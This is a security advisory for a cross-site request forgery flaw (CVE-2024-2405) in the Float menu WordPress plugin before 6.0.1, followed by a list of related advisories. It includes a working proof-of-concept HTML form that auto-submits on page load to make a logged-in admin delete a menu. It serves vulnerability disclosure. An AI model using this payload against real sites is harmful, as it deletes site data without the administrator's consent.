Float menu < 6.0.1 – Menu Deletion via CSRF | CVE 2024-2405 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admin delete arbitrary menu via a CSRF attack.

Proof of Concept

Make a logged in admin open one a page with the code below, this will make them delete the menu with ID 1:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=float-menu&action=delete-items&action2=delete-items" method="POST">
        <input type="text" name="ID" value="1"/>
        <input type="submit" value="submit">
    </form>
</body>

Affects Plugins

Fixed in 6.0.1

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

c42ffa15-6ebe-4c70-9e51-b95bd05ea04d

Timeline

Publicly Published

2024-04-11 (about 1 year ago)

Added

2024-04-11 (about 1 year ago)

Last Updated

2024-04-11 (about 1 year ago)

Other

Published

Title

Published

2024-12-05

Title

Country Blocker <= 3.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-03-24

Title

Typekit plugin for WordPress <= 1.2.3 - Cross-Site Request Forgery

Published

2023-01-20

Title

Bubble Menu - Circle Floating Menu < 3.0.2 - Form Deletion via CSRF

Published

2025-09-26

Title

HTACCESS IP Blocker <= 1.0 - Cross-Site Request Forgery

Published

2024-02-05

Title

Link Library < 7.6 - Cross-Site Request Forgery via action_admin_init